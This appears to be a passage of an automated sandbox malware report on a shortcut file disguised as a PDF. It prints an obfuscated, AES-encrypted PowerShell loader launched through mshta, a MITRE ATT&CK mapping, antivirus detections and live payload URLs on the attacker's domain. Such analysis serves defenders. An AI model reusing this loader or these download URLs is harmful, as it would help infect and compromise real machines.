ac4f25ea4db8c036bc8eabc00d579cc10384d09abd62b02e86c3a1c7f8c862de3364811cab68eb1786b7786bc5725d3493f05a15eaeee2ee6686d91a9b01cbd4c7885e2b196dab3663650f11d71eeedb96a2aaf3442ef119d05205b47f44d7200c81c465f54c21ebc99ff2b96579620097c613b589dd515e8cb8f3230a889e2c6385042ee85d8032b14d1f7031c085ba84f4af0c953a0070931bb3147c2d40ea5e24309522ae090cc33fd5b9a998f2f88d262ebf6918701f47bb35f236b9ad77bec3181393a4e03153a5f978106133c121b91e124075b26668fa32d6d38c829ef61ba386e20e210f9b2f8550f9d7f0472f77303a216fa96285e529d264ef798ac3ee226e25f6e9fd15a30a8b1993a229685bc002198be999c694c7545467374416d7458766a525558';function slf ($bnbdb){return -split ($bnbdb -replace '..', '0x$& ')};$rzzjri = slf($ddg.substring(0, 2208));$qvt = [system.security.cryptography.aes]::create();$qvt.key = slf($ddg.substring(2208));$qvt.iv = new-object byte[] 16;$ypsrn = $qvt.createdecryptor();$qvjapxuj = [system.string]::new($ypsrn.transformfinalblock($rzzjri, 0,$rzzjri.length)); sal fd $qvjapxuj.substring(3,3); fd $qvjapxuj.substring(6)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '3a0550e6f02ff19f0d7d65aba4322b948e6128c005b35a41c185638a3b71c4b033f6793763a141fc2df5f78a32cfe93fb3f106bbc73bc0347eb5117739ea6bcdc712dc4913ac95b231c44fd0e7658e3cb70005cf09fb0595ea559b76132daeb0d282beea68b55e7a9ba44ef8b45601264c8696bd55528ef1b9dd98948b27ec7ab79a994dce5dc246101471e8511e44683a6a4fe675f17184b0f45dd710b0f3e934d3e87202452fba857892530000f7a72aa942b3a7d215e363c31e439657bb692997478e7649840e3437d9791c71ee2b525ffbc5c786ea290ee8548d38794a4901d3e34e39a178b30a8bcb2e9f77f8824f798590e894baa701c583a6ee6499d5df0288032084ff43fa83e2c5c6512028f2396510d21950ef4f2fb6318f3a83552c75935d4092deb0c6b32cb3a99f0963415214d188c9ba0bf5d41a7805b5d549104e9b78022bf15fa2d7048395767284235f5312081a7124f018f4e91eacdbccf751a9f28ff37caf076b6690f025c400c18e2bd9e1a7bd3ed7f7a96c28c15f00b93909df3c243e431a52e02f105c946283d2d013b71935b51194d17b7ba6983861748e298038cead85ed1b369523e084e49c8d30900fe651d1ca9ce4aebc5ca07121e32bed105b864d5f70953dd58446fbaf635ca7bfb75757279a3990fb975f4a6ca8319bcbb285862375238fd471009713449c2b5759eb614ab609037130bdd0df5a80e11753bf15d370d14d9457e1a29a143c2993abcefc9ebb18a41fd7f01477b69689096d79b0c830798ee3fdd6ccaa115fed76da4c183fa9145ae9365194967dbd487693c4f977ee4623572cd65340f824d903a9bee74e567ba2a59d6049158ca16baf1e740dcff074d5b76acd69bd6e62c8ffe8acb399e025061a2791dcac39ad53da9b95ebe3b0e8f162ceda33ca00f31c9ee377c87715d2eb5d1329bba8d59e15de0e867d91d45fce6a1c1e307f17c1c44415ac23730598729b5af81791f4bd7dd68d59e5463c9a238bf8ba3d80f58d15cbcbd76a2244c6935e83f51aeb529749508568cdb60f284e5d4320ef0cf1db2fbec894a24ff83258219ec3a042e9ea4b7b09a2d6bbf3ba837ef69734c94330cc4312719b08a8d97bed4ca520d35a041f982d71d75204aae0ea20b8d73572e4bff0eb5ac4f25ea4db8c036bc8eabc00d579cc10384d09abd62b02e86c3a1c7f8c862de3364811cab68eb1786b7786bc5725d3493f05a15eaeee2ee6686d91a9b01cbd4c7885e2b196dab3663650f11d71eeedb96a2aaf3442ef119d05205b47f44d7200c81c465f54c21ebc99ff2b96579620097c613b589dd515e8cb8f3230a889e2c6385042ee85d8032b14d1f7031c085ba84f4af0c953a0070931bb3147c2d40ea5e24309522ae090cc33fd5b9a998f2f88d262ebf6918701f47bb35f236b9ad77bec3181393a4e03153a5f978106133c121b91e124075b26668fa32d6d38c829ef61ba386e20e210f9b2f8550f9d7f0472f77303a216fa96285e529d264ef798ac3ee226e25f6e9fd15a30a8b1993a229685bc002198be999c694c7545467374416d7458766a525558';function slf ($bnbdb){return -split ($bnbdb -replace '..', '0x$& ')};$rzzjri = slf($ddg.substring(0, 2208));$qvt = [system.security.cryptography.aes]::create();$qvt.key = slf($ddg.substring(2208));$qvt.iv = new-object byte[] 16;$ypsrn = $qvt.createdecryptor();$qvjapxuj = [system.string]::new($ypsrn.transformfinalblock($rzzjri, 0,$rzzjri.length)); sal fd $qvjapxuj.substring(3,3); fd $qvjapxuj.substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		121
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579316 Sample: Company Information.pdf.lnk Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 48 evanbconsultancy.com 2->48 50 x1.i.lencr.org 2->50 52 bg.microsoft.map.fastly.net 2->52 56 Windows shortcut file (LNK) starts blacklisted processes 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 6 other signatures 2->62 13 WMIC.exe 1 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 68 Contains functionality to create processes via WMI 13->68 70 Creates processes via WMI 13->70 19 powershell.exe 7 13->19         started        22 conhost.exe 1 13->22         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 signatures8 64 Windows shortcut file (LNK) starts blacklisted processes 19->64 24 powershell.exe 7 19->24         started        27 conhost.exe 19->27         started        process9 signatures10 66 Windows shortcut file (LNK) starts blacklisted processes 24->66 29 mshta.exe 16 24->29         started        process11 dnsIp12 54 evanbconsultancy.com 84.32.84.121, 443, 49702, 49716 NTT-LT-ASLT Lithuania 29->54 44 C:\Users\user\AppData\Local\...\Buddy[1], PE32 29->44 dropped 72 Windows shortcut file (LNK) starts blacklisted processes 29->72 74 Suspicious powershell command line found 29->74 34 powershell.exe 17 18 29->34         started        file13 signatures14 process15 process16 36 Acrobat.exe 77 34->36         started        38 conhost.exe 34->38         started        process17 40 AcroCEF.exe 108 36->40         started        process18 42 AcroCEF.exe 4 40->42         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Company Information.pdf.lnk29%ReversingLabsShortcut.Trojan.Pantera

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]29%ReversingLabsWin32.Trojan.Midie

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
evanbconsultancy.com
84.32.84.121
truetrue
    		unknown
    bg.microsoft.map.fastly.net
    		199.232.210.172
    		truefalse
      		high
      x1.i.lencr.org
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://evanbconsultancy.com/Sand/Buddytrue
          		unknown
          https://evanbconsultancy.com/Fuel/Company%20Information.pdffalse
            		unknown
            https://evanbconsultancy.com/Light/OGCMTYTR.msifalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://evanbconsultancy.com/Lightpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://evanbconsultancy.com/Sand/Buddyftmshta.exe, 0000000B.00000003.1531658058.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB7895000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://evanbconsultancy.com/Lighpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://evanbconsultancy.com/Fuel/Comppowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://evanbconsultancy.com/Light/OGCMTYTR.mpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://evanbconsultancy.com/Fuel/Company%20powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://evanbconsultancy.com/Sand/BuddyVBE;.JS;.JSE;.powershell.exe, 0000000A.00000002.1304752010.0000025E56780000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://evanbconsultancy.com/Sand/Buddy$global:?powershell.exefalse
                              		unknown
                              https://evanbconsultancy.com/Sand/Buddy$mshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://evanbconsultancy.com/Fuel/Company%20Information.pdfppowershell.exe, 0000000F.00000002.1429491981.000001BBBC47A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://gmpg.org/xfn/11powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://evanbconsultancy.compowershell.exe, 0000000F.00000002.1429491981.000001BBBC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://evanbconsultancy.com/Sand/BuddyLMEMPmshta.exe, 0000000B.00000002.1547904483.00000202BE42B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://evanbconsultancy.com/Fuelpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://evanbconsultancy.com/Sand/Buddy...P&mshta.exe, 0000000B.00000002.1546902300.00000202BA3CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://evanbconsultancy.com/Sand/BuddyC:mshta.exe, 0000000B.00000002.1544911094.000001FAB7820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://evanbconsultancy.com/Fuel/Company%20Inpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://evanbconsultancy.com/Fuepowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://evanbconsultancy.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.8.7powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://evanbconsultancy.com/Sand/BuddyRRC:mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://evanbconsultancy.com/Fuel/Company%20Informpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://contoso.com/powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1510173870.000001BBCA9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://evanbconsultancy.com/Fuel/Company%20Informatipowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://evanbconsultancy.com/Fuel/Company%20Information.ppowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://evanbconsultancy.com/Fuel/Company%20Infopowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://evanbconsultancy.com/Fuel/Company%2powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://evanbconsultancy.com/Fuel/Company%20Information.pdpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1305508383.0000025E5859C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBA831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://evanbconsultancy.com/Fuel/Company%20Information.powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://evanbconsultancy.com/Sand/Buddy...mshta.exe, 0000000B.00000003.1531829652.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547258447.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523488640.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1531462649.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522396244.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523025408.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1542373401.00000202BA470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://evanbconsultancy.com/Fuel/Company%20Informatpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://evanbconsultancy.com/Light/OGCMTYpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://evanbconsultancy.com/Fuel/Company%20Infpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://evanbconsultancy.com/Light/OGCMTpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://evanbconsultancy.com/Fuel/Copowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://evanbconsultancy.com/Fuel/Compowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://evanbconsultancy.com/Sand/Buddyhpowershell.exe, 0000000A.00000002.1305508383.0000025E589EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1510173870.000001BBCA9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.21.drfalse
                                                                                                		high
                                                                                                https://evanbconsultancy.com/Fuel/Companpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://evanbconsultancy.com/Sand/Buddyhttps://evanbconsultancy.com/Sand/Buddymshta.exe, 0000000B.00000003.1533016042.00000202BE745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://evanbconsultancy.com/Fuel/Cpowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://go.micropowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://evanbconsultancy.com/Fupowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://evanbconsultancy.com/Fuel/Compapowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://api.w.org/powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBACE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://evanbconsultancy.compowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                      		unknown
                                                                                                                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.1332911010.000001F6FD880000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drfalse
                                                                                                                        		high
                                                                                                                        http://crl.ver)svchost.exe, 0000000E.00000002.2526074517.000001F6FDA84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://evanbconsultancy.com/Lpowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://evanbconsultancy.copowershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              		unknown
                                                                                                                              https://evanbconsultancy.com/Light/OGCMTYTR.mspowershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://evanbconsultancy.com/Sand/Buddyppowershell.exe, 0000000A.00000002.1305508383.0000025E58541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://evanbconsultancy.com/Sand/BuddyqSVmshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://evanbconsultancy.com/mshta.exe, 0000000B.00000002.1545175154.000001FAB78B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      		unknown
                                                                                                                                      https://evanbconsultancy.com/Light/powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
